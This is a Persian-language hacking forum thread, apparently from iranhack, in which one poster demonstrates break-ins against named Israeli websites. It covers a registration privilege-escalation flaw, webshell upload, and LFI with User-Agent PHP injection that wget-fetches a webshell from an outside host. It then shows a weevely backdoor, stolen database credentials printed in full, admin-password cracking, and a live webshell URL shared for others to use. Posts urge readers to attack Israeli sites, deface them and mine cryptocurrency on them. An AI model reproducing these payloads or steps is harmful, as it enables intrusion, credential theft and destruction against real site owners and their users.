SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

تاپیک هکر های تازه وارد

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • #76
    درود بی کران
    در ادامه آموزش ها در خدمت شما هستیم با نفوذ به یک سایت اسرائیلی

    تارگت امروز مربوط به یک سیستم مدیریت محتوا با نام Over Sky مربوط به یک شرکت طراحی وب و هاستینگ با نام up.co.il هست ، امروز با هم قدم به قدم تا نفوذ کامل به هدف پیش میریم و این تارگت برای شما عزیزان بصورت آزاد برای تست قرار خواهد گرفت . ما بر اساس آموزش های گذشته همین تاپیک نفوذ را پیش میبریم .

    آدرس تارگت :

    کد:
    https://www.cheapopo.co.il
    یک فروشگاه آنلاین ، قبل از هر چیز این سایت را میتوانید با بررسی آسیب پذیری SQLI یا همان SQL Injection مورد نفوذ قرار دهید با بررسی لینک ها و پارامترهای داینامیک سایت میتوانید آسیب پذیری را شناسایی و مورد نفوذ قرار دهید .

    لینک آسیب پذیری SQLI

    کد:
    https://www.cheapopo.co.il/ViewCat.php?Cat=103
    چون بارها آسیب پذیری SQLI را با هم بررسی کردیم این تمرین با خود شما و ما امروز میخواهیم از طریق یک آسیب پذیری دیگر این سایت را مورد نفوذ قرار دهیم .

    نگاهی به نتیجه اسکن acunitex می اندازیم :

    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: au.png
مشاهده: 403
حجم: 111.9 کیلو بایت

    همانطور که مشاهده میکنید اسکنر از سایت آسیب پذیری SQL و XSS شناسایی کرده که شما میتوانید به عنوان تارگت تمرینی بر روی این هدف کار کنید ، نمایی از نفوذ در SQLMAP را در تصویر زیر میتوانید ببینید .

    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: sqlmap.png
مشاهده: 381
حجم: 49.6 کیلو بایت
    خوب پس این تمرین شماست و ما با یک آسیب پذیری دیگر نفوذ را شروع میکنیم :


    آسیب پذیری user Register یا registration/signup

    تعریف صحیح توابع و سطوح دسترسی کاربران یکی از نکات مهم در طراحی وبسایت میباشد ، چندین سال پیش از جوملا آسیب پذیری خطرناکی شناسایی شد که نفوذگر در هنگام عضویت role یا Group id خود را تغییر میداد و با یک یوزر عادی در سطح مدیران وبسایت قرار میگرفت و میتوانست به کنترل پنل مدیریت ورود پیدا کند ، سیستم های مدیریت محتوای بسیاری یا بدلیل عدم زمان و یا به دلیل عدم دانش و یا به دلیل سهل انکاری به این نکته مهم توجه ندارند و نفوذگر میتواند به واسطه یک عضویت ساده و تغییراتی جزیی در هنگام ارسال هدر ارسالی به سمت سرور یوزر خود را به ادمین تبدیل کند .
    در برنامه نویسی سیستم های مدیریت محتوا به این نکته دقت ویژه ای داشته باشید هر یوزر در گروه خود قرار بگیرد و به راحتی قابل دور زدن نباشد . در این تارگت من به شما نمونه ای از این حملات را نشان خواهم داد که به واسطه ثبت نام یوزر عادی به کنترل پنل مدیریت لاگین میکنم و در نهایت از تارگت وب شل میگیرم و کنترل کامل سایت را به دست خواهم گرفت .

    آدرس کنترل پنل مدیریت تارگت :


    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: cp.png
مشاهده: 380
حجم: 14.0 کیلو بایت


    در اولین مرحله برای تست آسیب پذیری ثبت نام و عدم تعریف سطح کاربری ابتدا باید داخل وبسایت عضو شوید .

    پس به دنبال عضویت سایت میگردیم معمولا در صفحه اصلی و قسمت ورود کاربران گزینه ثبت نام وجود دارد .

    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: rrreg.png
مشاهده: 378
حجم: 249.5 کیلو بایت
    از طریق صفحه لاگین login.php لینک ثبت نام را پیدا کردیم حالا ثبت نام را انجام میدهیم .

    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: Untitled-1.jpg
مشاهده: 377
حجم: 47.1 کیلو بایت
    خوب ثبت نام انجام شد ، حالا به کنترل پنل مدیریت بر میگیردیم و همین یوزر و پسورد را برای ورود به کنترل پنل مدیریت بررسی میکنیم .

    اگر برنامه نویس گروپ ایدی ها را به درستی تعریف نکرده باشد و سیشن ورود تنها لیست یوزر ها را برای ورود بدون تعریف هیچ role بخواند ما به کنترل پنل مدیریت وارد میشویم .

    در ادامه همراه ما باشید .

    -----------------------------SAFE MASTER---------------------------
    تاپیک هکر های تازه وارد

    نظر


    • #77
      با یوزر ساخته شده به قسمت Admin میرویم و لاگین را بررسی میکنیم اگر لاگین انجام شد تارگت آسیب پذیر است و تنها داده ها را از جدول کاربران دیتابیس بدون در نظر گرفتن Group id فراخوانی میکند .

      برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: Untitled-3.jpg
مشاهده: 399
حجم: 55.3 کیلو بایت
      حالا به سراغ پیدا کردن آپلود و در نهایت آپلود شل میرویم معمولا در قسمتی که پست های سایت قرار گرفته ادیتور ها دارای آپلودر هستند :

      برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: shell.png
مشاهده: 373
حجم: 97.8 کیلو بایت
      همانطور که در تصویر میبینید با یک یوزر ساده به تمامی محتوای مدیریت دسترسی پیدا کردیم و میتوانیم آنها را ویرایش ، حذف و یا اضافه کنیم حالا یه آپلودر شناسایی کردیم و با دادن یک وبشل و انجام مراحل بای پس آپلودر (که قبلا مفصل آموزش دادیم) از تارگت شل میگیریم .
      نکته جالب اینجاست آپلودر و آنتی ویروس سرور هر وب شلی را قبول نمیکند و نیاز داریم به وبشل هایی که از فانشن های پابلیک استفاده نکنند و حجم انها کمتر از 20 کیلوبایت باشد .
      در صورتی که شل با حجم بالاتر یا فانشن های پابلیک استفاده کنیم با خطای مقابل در آپلودر رو به رو میشویم :

      برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 345345.png
مشاهده: 371
حجم: 72.9 کیلو بایت

      حالا برای بای پس این تارگت من چندین وبشل بررسی کردم و در نهایت یک وبشل با حجم و فانشن مناسب برای این تارگت شناسایی کردم و وبشل با موفقیت آپلود شد .
      همچنین آپلودر دیگری در قسمت ادیتور وجود داشت که از طریق آن نیز توانستیم شل بگیریم :

      برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: sss.png
مشاهده: 373
حجم: 101.0 کیلو بایت
      در نهایت شل آپلود شده را لود میکنیم :

      برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 57567567567.png
مشاهده: 373
حجم: 42.9 کیلو بایت

      پس از آپلود شل مخصوصا تارگت های اسرائیلی که از دشمنان ما هستند .
      ابتدا فایل کانفیگ سایت را بخوانید به دیتابیس متصل شوید و دیتابیس آن را به دلیل احتمال وجود یوزر و پسورد های اعضا دانلود کنید سپس در صورت نیاز از فایل ها و اسکریپت ها نیز بکاپ بگیرید و با دقت بررسی کنید اگر به درد بخور بود که نگه دارین اگر هم نه میتونین برای مایند کردن ارز دیجیتال یا هزار کار دیگه استفاده کنید .

      دیفیس نکنید به هیچ وجع تا وقتی که کارتون باهاش تموم نشده اما من دیفیس میکنم نمیدونم چرا ولی دیفیس میکنم بعدم شلو میزارم شما هم برین دیفیس کنید بریزین سرشون خونه خرابشون کنید .


      -----------------------------SAFE MASTER---------------------------
      تاپیک هکر های تازه وارد

      نظر


      • #78
        خوب دوستان چون این تارگت آموزشی بود شلو میزارم براتون
        برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 346346346788-0.png
مشاهده: 385
حجم: 89.7 کیلو بایت


        index رو دستکاری نکنید تا تمامی دوستان از این آموزش استفاده کنند ،

        کد:
        https://www.cheapopo.co.il//uploads/sites/site_1/tempuploads/m.php?&s=r&cmd=dir&dir=./../../../..
        تارگت اسرائیلی بزنید زیاد هم بزنید

        این هم به افتخار بچه های ایران هک



        برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: def2.png
مشاهده: 376
حجم: 650.1 کیلو بایت

        امیدوارم استفاده کرده باشید . پیروز باشید .
        -----------------------------SAFE MASTER---------------------------
        تاپیک هکر های تازه وارد

        نظر


        • #79
          سلام مجدد به عزیزان

          خوب با یه آموزش دیگه و با یه تارگت اسرائیلی دیگه در خدمتتون هستم

          نام این آسیب پذیری Directory traversal هست که اگر بتونیم فایل های حساسی رو بخونیم میتونیم به LFI تبدیلش کنیم و از تارگت شل بگیریم

          هسته اصلی حمله این آسیب پذیری User Agent هست که به جای User Agent یک کد رو به سمت وب سرور میفرستیم و اگر محدودیت امنیتی براش تعریف نشده باشیم میتونیم فایل وبشل را رو به واسطه دستور های php بر روی سایت هدف WGET کنیم .

          در نظر داشته باشید Wget بطور مستقیم بر روی شاخه اصلی root یا همون www یا public_html هدف اعمال میشه .

          خوب تارگت و بررسی آسیب پذیری رو با هم میبینیم :
          برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 1.jpg
مشاهده: 380
حجم: 256.8 کیلو بایت

          خوب تا اینجای کار مطمئن هستیم که تارگت آسیب پذیری Directory traversal داره اما به این راحتی ها دیوار آتش سایت نزاشت فایل کانفیگ بخونیم پس میریم سراغ LFI و بررسی فایل proc/self/environ

          وقتی این فایل خونده بشه ما میتونیم به User Agent حمله کنیم یا همون tamper هدر رو روی اون انجام بدیم که در نهایت میتونیم یک دستور php رو باهاش اجرا کنیم و برای گرفتن شل از دستور WGET استفاده میکنیم که یک فایلو از یک منبع دیگه دریافت میکنه و توی این سایت میریزه خلاصه کل این آسیب پذیری این میشه
          برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 2.jpg
مشاهده: 359
حجم: 186.2 کیلو بایت


          نرم افزار Burp Suite را باز میکنیم و لینک آسیب پذیری را درون آن لود میکنیم :

          کد:
          http://www.tropicasa.co.il/index.php?pathAjax=../../../../../../../../../../../../../../../ proc/self/environ

          برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 3.jpg
مشاهده: 357
حجم: 275.3 کیلو بایت

          خوبه حالا برای جایگزاری user agent به همچین کدی نیاز داریم :

          کد:
          <?system('wget https://anysite.com/uploads/webshell.txt -O shell.php');?>
          بیاین این کدو تحلیل کنیم :

          system(); یک فانشن اجرایی دستور در php هست که مدل های دیگه ای هم داره که برای بای پس بسیار نیازه
          wget دستور دریافت فایل از یک منبع دیگه و ریختن در منبع جدید که در اون هستیم
          https://anysite.com/uploads/webshell.txt فایل دارای سورس وب شل به فرمت txt که روی یک سایت دیگه آپلود شده تا به وسیله دستور WGET اونو بریزیم توی این سایت (هر جایی آپلود کردید مهم نیست فقط لینک txt دایرکت باشه)
          -O shell.php دستور ریختن محتوای فایل txt که wget کردیم داخل یک فایل php که بر روی روت هدف قرار میگیره بطور مثال target.com/shell.php

          خوب تا اینجای کار به ساده ترین روش ممکن همه چی رو توضیح دادیم حالا میریم سراغ تغییر useragent با کد:

          توجه کنید که بعضی سرور ها فانشن های مثل همین system رو بستن و نیاز به استفاده از یه فانشن دیگه برای بای پس داریم این تارگت همینطوره و میخام در عین حالی که آموزش میبینید بای پس اونو هم آموزش ببینید :

          من یه فایل txt روی تارگت قبلیمون که زدیم و شل کردیم ریختم تا بدم واسه WGET محتوای txt میتونه کد وبشل باشه میتونه متن باشه میتونه کد php باشه این بسته به سلیقه حمله شماست من این کدو قرار میدم :

          webshell.txt
          کد:
          <?php
          echo 'I R a N H  aC K For Ever';
          ?>
          هدف اینه که من این کد php رو توی یک فایل روی تارگت اجرا کنم که میتونین بجای کد php سورس شل بزارین

          کد:
          <?system('wget https://www.cheapopo.co.il/uploads/sites/site_1/tempuploads/webshell.txt -O shell.php');?>

          برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 4.jpg
مشاهده: 360
حجم: 282.0 کیلو بایت
          خوب انتقال انجام شد اما فایل php به دلیل این خطا اجرا نشد .

          دیوار اتش سرور یا یه htaccess توی روت سایت مانع اجرای فایل با پسوند php بدون سطح دسترسی یوزر یا روت میشه .
          به جای .php میزاریم .php3 و دوباره با این پسوند درخواستو توی brup ارسال میکنیم :

          پس دستور اینطوری میشه shell.php3

          کد:
          <?system('wget https://www.cheapopo.co.il/uploads/sites/site_1/tempuploads/webshell.txt -O shell.php3');?>
          برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 6.jpg
مشاهده: 360
حجم: 154.1 کیلو بایت



          با موفقیت بر روی وبسایت هدف قرار گرفت .

          تبریک میگم شما با موفقیت وبشلو انتقال دادین در ادامه به روش های بای پس فانشن ها و دور زدن دیوار آتش در حملات LFI میپردازیم همچنین فیلم آموزشی این نفوذ نیز قرار داده خواهد شد

          با ما همراه باشید

          -----------------------------SAFE MASTER---------------------------
          تاپیک هکر های تازه وارد

          نظر


          • #80
            روش های بای پس در آسیب پذیری LFI

            برخی تارگت ها مثل همین تارگت قبل فانشن system رو میبندن شما بجای این فانشن که یک فانشن اجرایی هست میتونین از فانشن های مشابه اون در php استفاده کنید :

            فانشن exec


            فانشن system


            فانشن shell-exec (توصیه میشه برای همین تارگت)


            فانشن passthru


            فانشن proc-open


            بطور مثال بجای فانشن سیستم که در زیر مشاهده میکنید :

            کد:
            <?system('wget https://anysite.com/uploads/webshell.txt -O shell.php3');?>
            من میخام از فانشن مشابه اون استفاده کنم و shell-exec رو برای اینکار از بین فانشن های بالا انتخاب میکنم :

            کد:
            <?shell_exec('wget https://anysite.com/uploads/webshell.txt -O m.php3');?>
            و اگر پسوند php رو مستقیما قبول نکرد از پسوند های php3 php5 php4 inc txt , ..... استفاده کنید بطور کلی پسوند های مختلفو برای بای پس تست کنید . بهتره از نام های shell و webshell هم استفاده نشه من برای آموزش شما از این نامها استفاده کردم .

            در نهایت ما همون فایل webshell.txt را به file.txt تغییر نام دادیم و بجای shell.php نام فایل نهایی رو m.php3 قرار دادیم با همون محتوا iranhack for ever
            فانشن system به shell_exec تغییر کرد

            کد:
            <?shell_exec('wget https://www.cheapopo.co.il/uploads/sites/site_1/tempuploads/file.txt -O m.php3');?>

            برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: Untitled.png
مشاهده: 369
حجم: 48.5 کیلو بایت
            فیلم آموزشی این نفوذ نیز تهیه شد و برای دانلود شما عزیزان در ادامه همین پست قرار گرفته :



            لینک دانلود ویدئو آموزشی LFI



            برای بررسی اینطور آسیب پذیری ها و پیدا کردن اونها میتونید از دورک هایی که در انجمن برای LFI قرار گرفته استفاده کنید و سعی کنید تا میتونین این il ها را مثل موش آزمایشگاهی بلا سرشون بیارین


            منتظر آموزش های دیگه ما باشین

            نظر بزارین خوشحال میشیم
            سوالی بودن بپرسین
            سایتهای ایرانی رو امن کنید
            سایتهای اسرائیلی رو نابود

            خوش باشید.
            -----------------------------SAFE MASTER---------------------------
            تاپیک هکر های تازه وارد

            نظر


            • #81
              نوشته اصلی توسط SafeMaster نمایش پست ها
              روش های بای پس در آسیب پذیری LFI

              برخی تارگت ها مثل همین تارگت قبل فانشن system رو میبندن شما بجای این فانشن که یک فانشن اجرایی هست میتونین از فانشن های مشابه اون در php استفاده کنید :

              فانشن exec


              فانشن system


              فانشن shell-exec (توصیه میشه برای همین تارگت)


              فانشن passthru


              فانشن proc-open


              بطور مثال بجای فانشن سیستم که در زیر مشاهده میکنید :

              کد:
              <?system('wget https://anysite.com/uploads/webshell.txt -O shell.php3');?>
              من میخام از فانشن مشابه اون استفاده کنم و shell-exec رو برای اینکار از بین فانشن های بالا انتخاب میکنم :

              کد:
              <?shell_exec('wget https://anysite.com/uploads/webshell.txt -O m.php3');?>
              و اگر پسوند php رو مستقیما قبول نکرد از پسوند های php3 php5 php4 inc txt , ..... استفاده کنید بطور کلی پسوند های مختلفو برای بای پس تست کنید . بهتره از نام های shell و webshell هم استفاده نشه من برای آموزش شما از این نامها استفاده کردم .

              در نهایت ما همون فایل webshell.txt را به file.txt تغییر نام دادیم و بجای shell.php نام فایل نهایی رو m.php3 قرار دادیم با همون محتوا iranhack for ever
              فانشن system به shell_exec تغییر کرد

              کد:
              <?shell_exec('wget https://www.cheapopo.co.il/uploads/sites/site_1/tempuploads/file.txt -O m.php3');?>

              برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: Untitled.png
مشاهده: 369
حجم: 48.5 کیلو بایت
              فیلم آموزشی این نفوذ نیز تهیه شد و برای دانلود شما عزیزان در ادامه همین پست قرار گرفته :



              لینک دانلود ویدئو آموزشی LFI



              برای بررسی اینطور آسیب پذیری ها و پیدا کردن اونها میتونید از دورک هایی که در انجمن برای LFI قرار گرفته استفاده کنید و سعی کنید تا میتونین این il ها را مثل موش آزمایشگاهی بلا سرشون بیارین


              منتظر آموزش های دیگه ما باشین

              نظر بزارین خوشحال میشیم
              سوالی بودن بپرسین
              سایتهای ایرانی رو امن کنید
              سایتهای اسرائیلی رو نابود

              خوش باشید.
              سلام ممنون مثل همیشه عالی
              نمیدونستم توی ایجنتم میشه پیلود تزریق کرد
              یه سری آموزش چرتی راجب lfi دیده بودم که جلو پارامتر آدرس سایت میدادن میخواستن لود شه :/
              بعد این کاری که روی ایجنت پیاده کردینو میشه روی سایتی که lfi نداره مثلا تو همون صفحه index پیاده کرد نتیجه گرفت؟ وجود داشته همچین چیزی؟
              تشکر

              نظر


              • #82
                سلام نه این بحث مستلزم وجود آسیب پذیری کنترل داخلی فایل هست .
                روش های مختلفی برای tamper کردن وجود داره که توی بحث tamper و گرفتن هدر ها در بعضی آموزش ها کمی پیچیده توضیح داده شده برای عزیزانی که میخان بار اول این آموزشو پیش ببرن
                من سعی کردم به ساده ترین روش ممکن این آسیب پذیری رو توضیح بدم در همین تاپیک مکانیسم آسیب پذیری LFI و RFI را کامل توضیح دادم .
                در مورد اضافه کردن پارامتر جلوی آدرس سایت اون مربوط میشه به آسیب پذیری RFI که یه وبشل خارج از مسیر به سایت تزریق میکنند و اگر لود کرد میتونین دسترسی بگیرین
                همه این خطاها بر میگرده به تعریف نکردن فانشن های مناسب و صحیح که باعث میشه به جای لود کردن یک فایل داخلی بطور مثال home.php نفوذگر فایل های حساس رو لود کنه یا اصلا یه مسیر از یک سرور دیگه رو لود کنه .
                کد:
                site.com/page.php?page=home.php
                site.com/page.php?page=../../../ etc/passwd
                site.com/page.php?page=home/user/public_html/config.php
                site.com/page.php?page=http://google.com
                site.com/page.php?page=http://hackersite.com/webshell.txt?
                ویرایش توسط SafeMaster : https://www.iranhack.com/forum/member/3631-safemaster در ساعت 03-29-2022, 02:51 PM
                -----------------------------SAFE MASTER---------------------------
                تاپیک هکر های تازه وارد

                نظر


                • #83
                  سلام مجدد بر عزیزان ایران هک دوستان هی میگن من عیدی بدم
                  ما که اوضاع مالیمون خرابه عیدی نمیتونیم بدیم ولی آموزش هایی خوبی براتون گذاشتم

                  در این آموزش در خدمت شما هستیم با دسترسی ریموت از یک تارگت اسرائیلی که محدودیت در اجرای php داره و فقط فایل های php با سطح دسترسی یوزر خودش را مجاز به اجرا میدونه که البته با .php3 بای پس میشه
                  هدف در این دسترسی اتصال ریموت به وسیله ابزار weevely و در نهایت اتصال به دیتابیس و خوندن یوزر ادمین هست .

                  تارگت همون قبلی http://www.tropicasa.co.il
                  ابزار مورد نیاز یه کالی لینوکس
                  یک عدد adminer
                  و کمی حوصله

                  در ابتدا با ابزار weevely اگر آشنا نیستید کمی براتون توضیح میدم
                  Weevely is a command line web shell dynamically extended over the network at runtime, designed for remote server administration
                  وییولی یک نوع وب شل دستوری از راه دور هست که درا بتدا یک فایل php کم حجم به شما میده و شما اونو روی سایت هدف آپلود میکنید و از طریق لینوکس میتونید همانند محیط ssh دستورات خودتونو بصورت کنترل از راه دور به هدف بزنید و محیطی شبیه به ssh را برای شما محیا میکند .

                  برخی مواقع دیوارت آتش و آنتی ویرویس های موجو بر روی سایت اجازه انتقال وبشل و یا ساخت اونو به شما نمیدهند و شما برای دور زدن این قابلیت نیاز به ابزار های backdoor همانند weevely دارید در تارگت LFI پست قبلی ما امکان اجرای فایل php نداشتیم و با تغییر پسوند به php3 این محدودیت را دور زدیم اما مشکل بعدی اینجاست که اجازه انتقال وبشل و اجرای اونو بهتون نمیده برای همین در این پست ما به شما نشون میدیم چطور دستورات مورد نیازتونو به همراه اتصال به پایگاه داده تا دسترسی از کنترل پنل مدیریت و خواندن پسورد ادمین انجام بدید .

                  برای استفاده از وییولی ابتدا در محیط کالی لینوکس یا لینوکسی که پکیج وییولی بر روی آن نصب شده است دستور زیر را وارد کنید تا یه فایل php برای انتقال به سایت هدف بسازد :

                  برای دیدن سایز بزرگ روی عکس کلیک کنید  نام: wee.jpg مشاهده: 0 حجم: 40.7 کیلو بایت


                  کد دستوری weevely بطور کامل در بالا ساخته شده است که بصورت زیر است

                  کد:
                  weevely generate password filename.php
                  سپس فایل ساخته شده در مسیری که قرار دارید ساخته میشود و فایل را برای آپلود بردارید .

                  بطور مثال فایل ساخته شده من بصورت زیر است :

                  برای دیدن سایز بزرگ روی عکس کلیک کنید  نام: 2.jpg مشاهده: 0 حجم: 53.9 کیلو بایت

                  حالا طبق آموزش گذشته سورس فایل remote.php را در محلی آپلودی میکنیم و از طریق آسیب پذیری LFI اونو به هدف منتقل میکنیم با پسوند php3

                  برای دیدن سایز بزرگ روی عکس کلیک کنید  نام: 3.png مشاهده: 0 حجم: 128.4 کیلو بایت
                  خوب فایل با موفقیت از طریق آسیب پذیری LFI منتقل شد حالا باید از طریق ترمینال به بک دور یا همون فایل remote.php3 متصل بشیم و دستورات مورد نظرمونو وارد کنیم .

                  برای اتصال به weevely از دستور زیر در ترمینال استفاده میکنیم :

                  کد:
                   weevely http://www.tropicasa.co.il/remote.php3 1234
                  برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 4.jpg
مشاهده: 323
حجم: 29.7 کیلو بایت


                  حالا بطور مثال دستور ls -la برای نشان دادن فایل ها و فولدر ها را اجرا میکنیم :

                  برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 6.png
مشاهده: 325
حجم: 82.2 کیلو بایت

                  همانطور که مشاهده کردید به موفقیت دستور اجرا شد و کلیه فایل های موجود بر روی سایت مورد رویت قرار گرفت در ادامه با ما همراه باشید با دسترسی به دیتابیس و بک آپ گیری به همراه خواندن پسورد ادمین .
                  ویرایش توسط SafeMaster : https://www.iranhack.com/forum/member/3631-safemaster در ساعت 03-30-2022, 05:18 PM
                  -----------------------------SAFE MASTER---------------------------
                  تاپیک هکر های تازه وارد

                  نظر


                  • #84
                    خوب در ادامه میریم سراغ انتقال adminer.php یا همون فایل مدیریت دیتابیس و سپس خواندن فایل config.php که شامل اطلاعات دیتابیس هست .

                    برای انتقال Adminer میخواهیم از دستور WGET استفاده کنیم بنا براین سورس فایل را در یک سایت دیگر آپلود کنید و از دستور Wget استفاده کنید من اینجا از سایت github فایل adminer را منتقل میکنم .

                    Adminer (formerly phpMinAdmin) is a full-featured database management tool written in PHP. Conversely to phpMyAdmin, it consist of a single file ready to deploy to the target server. Adminer is available for MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch, MongoDB and others via plugin.



                    دستور به صورت زیر میشود :
                    کد:
                    wget https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1-en.php
                    * نکته مهم اگر قصد داشتید از مبع دیگری غیر از github منتقل کنید بصورت .txt آپلود کنید و در نهایت با دستور mv فرمت فایل را به php3 تغییر دهید در اینجا چون دانلود از github بصورت RAW یعنی سورس خام انجام می پذیرد ما فایل را بطور php منتقل کردیم .

                    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 7.png
مشاهده: 331
حجم: 98.6 کیلو بایت
                    در نهایت فایل دریافت شد اما با نام adminer-4.8.1-en.php با توجه به محدودیت اجرای php ما فایل را با دستور mv به adminer.php3 تغییر نام میدهیم :

                    کد:
                    mv adminer-4.8.1-en.php adminer.php3
                    و در نهایت فایل را لود میکنیم :

                    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 8.png
مشاهده: 323
حجم: 15.9 کیلو بایت


                    حالا با دستور cat فایل config.php که اطلاعات دیتابیس در آن ذخیره شده است را میخوانیم :

                    کد:
                    cat config.php
                    محتوای فایل config.php اینکود فایل دیگری را برای اطلاعات یوزر و پسورد معرفی نمود :

                    کد:
                    <?php
                    
                    /**
                    * @author CSite
                    * @copyright 2013
                    */
                    
                    
                    // Get server config
                    include_once 'config-server.php';
                    
                    /** Mysql config */
                    $config['mysql'] = array (
                    
                    'host' => $cfg['mysql_host'],
                    'username' => $cfg['mysql_username'],
                    'password' => $cfg['mysql_password'],
                    'db_name' => $cfg['mysql_db'],
                    );
                    
                    /** Developer mode */
                    $config['developerMode'] = array (
                    // developer mode show sql errors and queries in the end of html
                    // site (client)
                    'site_showSqlErrors' => $cfg['developerMode_site_errors'],
                    'site_showSqlQueries' => $cfg['developerMode_site_queries'],
                    
                    // admin panel
                    'ap_showSqlErrors' => $cfg['developerMode_ap_errors'],//$_SERVER['REMOTE_ADDR'] == '84.95.45.126' ? 1 : 1,
                    'ap_showSqlQueries' => $cfg['developerMode_ap_queries'],//$_SERVER['REMOTE_ADDR'] == '84.95.45.126' ? 1 : 1,
                    );
                    محتوای فایل config-server.php

                    کد:
                    $cfg['url'] = 'http://www.tropicasa.co.il';
                    $cfg['version'] = time();
                    
                    $cfg['mysql_host'] = 'localhost';
                    $cfg['mysql_username'] = 'tropicasa';
                    $cfg['mysql_password'] = '9KjOiTG1';
                    $cfg['mysql_db'] = 'tropicasa_tropi';
                    
                    $cfg['developerMode_site_errors'] = false;
                    $cfg['developerMode_site_queries'] = false;
                    $cfg['developerMode_ap_errors'] = 0;
                    $cfg['developerMode_ap_queries'] = 0;
                    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 9.png
مشاهده: 325
حجم: 20.7 کیلو بایت


                    خوب حالا یوزر و پسورد دیتابیس را بدست آودریم و متصل میشویم :

                    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 10.png
مشاهده: 322
حجم: 21.9 کیلو بایت
                    و در نهایت با موفقیت متصل میشویم :

                    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 11.png
مشاهده: 323
حجم: 68.6 کیلو بایت
                    پس از بکاپ گیری جدول مربوط به یوزر ها را باز میکنیم و پسورد ادمین را شناسایی میکنیم حالا دو راه داریم یا پسورد جدید جایگذاری کنیم و یا پسورد هش شده را کرک کنیم .
                    در ادامه با ما همراه باشید .
                    -----------------------------SAFE MASTER---------------------------
                    تاپیک هکر های تازه وارد

                    نظر


                    • #85
                      پسورد را کرک کردیم

                      برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 12.png
مشاهده: 337
حجم: 29.7 کیلو بایت
                      123456 بود ! بله !

                      همیشه تارگت ها هر چقدرم سخت پیش برن در نهایت یه جای دیگه یه سوتی عظیم دادم ...

                      بپذریم یوزر و پسورد را بر میداریم و میریم سراغ صفحه Admin

                      user:[email protected]
                      pass:123456



                      برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 13.png
مشاهده: 322
حجم: 12.1 کیلو بایت

                      و در نهایت لاگین میکنیم :
                      برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 14.png
مشاهده: 323
حجم: 47.0 کیلو بایت



                      و تمام دسترسی دستوری اعمال شد دسترسی به دیتابیس و کنترل پنل مدیریت هم همینطور

                      ما این مراحل را با بای پس های مختلف و آسیب پذیری LFI پیش بردیم تنها برای آموزش به شما عزیزان اما همیشه در نظر داشته باشید صفحه لاگینی که باز بود حتما بروت فورس کنید شاید پسورد ساده ای گذاشته شده باشد و اصلا نگاه به شکل و شمایل سایت و سرور نکنید .

                      امیدوارم استفاده کرده باشید منتظر آموزش های آتی ما باشید .

                      لایک و کامنت یادتون نره زیر همین پست
                      -----------------------------SAFE MASTER---------------------------
                      تاپیک هکر های تازه وارد

                      نظر


                      • #86
                        لیست فایلهای حساس در حملات lfi در سرور های مختلف :

                        فایل های پیوست شده
                        -----------------------------SAFE MASTER---------------------------
                        تاپیک هکر های تازه وارد

                        نظر


                        • #87
                          salam linke page 24 moshkel dare bala nemiad

                          نظر


                          • #88
                            لینک پیج 24 ! ؟

                            اگر منظورتون لینک تارگت ها هست
                            احتمالا پچ شدند باید دنبال تارگت جدید بگیردید

                            چون این تاپیک کلا 6 صفحه داره
                            -----------------------------SAFE MASTER---------------------------
                            تاپیک هکر های تازه وارد

                            نظر


                            • #89
                              درود مجدد به عزیزان ایران هک و دنبال کنندگان تاپیک هکرهای تازه وارد
                              امیدوارم از مطالب به نحو احسن استفاده کرده باشید .
                              به دلیل درخواست زیاد عزیزان و سوالات مکرر در مورد حملات بروت فورس با ابزار محبوب burpsuite تصمیم گرفتیم مطلب امروز رو اختصاص بدیم به حملات بروت فورس به وسیله ابزار burp suite با ما همراه باشید .

                              همانطور که قبلا در آموزش ها توضیح دادیم یکی از رایج ترین خطاهایی که منبجر به نفوذ به تارگت ها میشود پسورد ضعیف یا Weak Password میباشد ، گاهی اوقات باید یک مسیر طولانی را برای نفوذ و تست نفوذ تارگت دنبال کنیم اما در نهایت میبینیم که پسورد بسیار ساده بوده است همانند آموزش قبلی که از طریق آسیب پذیری LFI از تارگت دسترسی گرفتیم و وقتی دیتابیس را مورد بازبینی قرار دادیم شاهد پسورد 123456 بودیم !!

                              هیچ گاه فراموش نکنید سخت ترین تارگت ها با بالا رفتن تعداد کاربر ضریب امنیتی در مورد پسورد ضعیف در آنها نیز بالا میرود ، پس در لیست پنتست خود در اولین قدمها بروت فورس و دیکشنری اتک را قرار دهید .
                              در بین سالهای 2013 تا 2016 هکر هندی به نام hmie7 که علاقه زیادی به دیفیس داشت و قصد گرفتن عنوان تاپ دیفیسر در وبسایت zone-h را داشت ابزاری برای بروت فورس اتوماتیک جوملا و وردپرس طراحی کرد و شدیدا در این حملات موفق بود و در آن بازه زمانی هر سروری که بررسی میکردیم شاهد یک یا چند دسترسی توسط این هکر بودیم ، نکته اصلی حملات این نفوذگر همین حملات پسورد ضعیف بود .

